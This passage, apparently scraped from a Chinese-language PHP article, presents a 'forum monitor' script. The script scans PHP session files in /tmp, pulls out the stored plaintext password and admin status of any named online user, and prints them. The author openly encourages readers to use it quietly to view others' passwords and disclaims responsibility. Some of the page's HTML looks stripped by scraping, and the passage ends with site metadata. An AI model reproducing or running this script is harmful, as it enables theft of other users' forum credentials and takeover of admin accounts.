如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道該session存放的位置,而且可以上傳檔案,所以嘛,當時就做了一次小小的駭客,線上的朋友的密碼可以一覽無餘,呵呵:
function submit1(){
global $username;
print "論壇監聽器";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?連我你也查?";
return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "使用者筆名:".$name[2]."
使用密碼:".$passwd[2]."
使用模式:";
if($mode[1]==1)
print "管理員";
else
print "一般使用者";
print"
偷竊他人密碼是不道德行為請少少為之
";
$i=1;
break;
}}}}
if(!$i)
print "使用者:".$username."真的線上嗎?如你確定,請再來一次,不要多打空格!";
$d->close();
}
function login(){
?>
論壇監聽器
論壇監聽器
| 當你看到一使用者線上時你想看他的密碼,你要如何作呢? |
| 讓我來告訴你:就是使用本程式。 |
鄭重申明:本程式為自由程式,由它所造成的任何損失本人蓋不負責。
不過這個問題也許很快就會被堵上,個位還是不要張揚的偷著用吧。 |
}
//--------------main()
if($submit1)
submit1();
else
login();
?>
http://www.bkjia.com/PHPjc/319459.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/319459.htmlTechArticle如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道該session存放的位置,而且可以上傳檔案,所以嘛,當時就做了一次小小的駭客,線上的朋...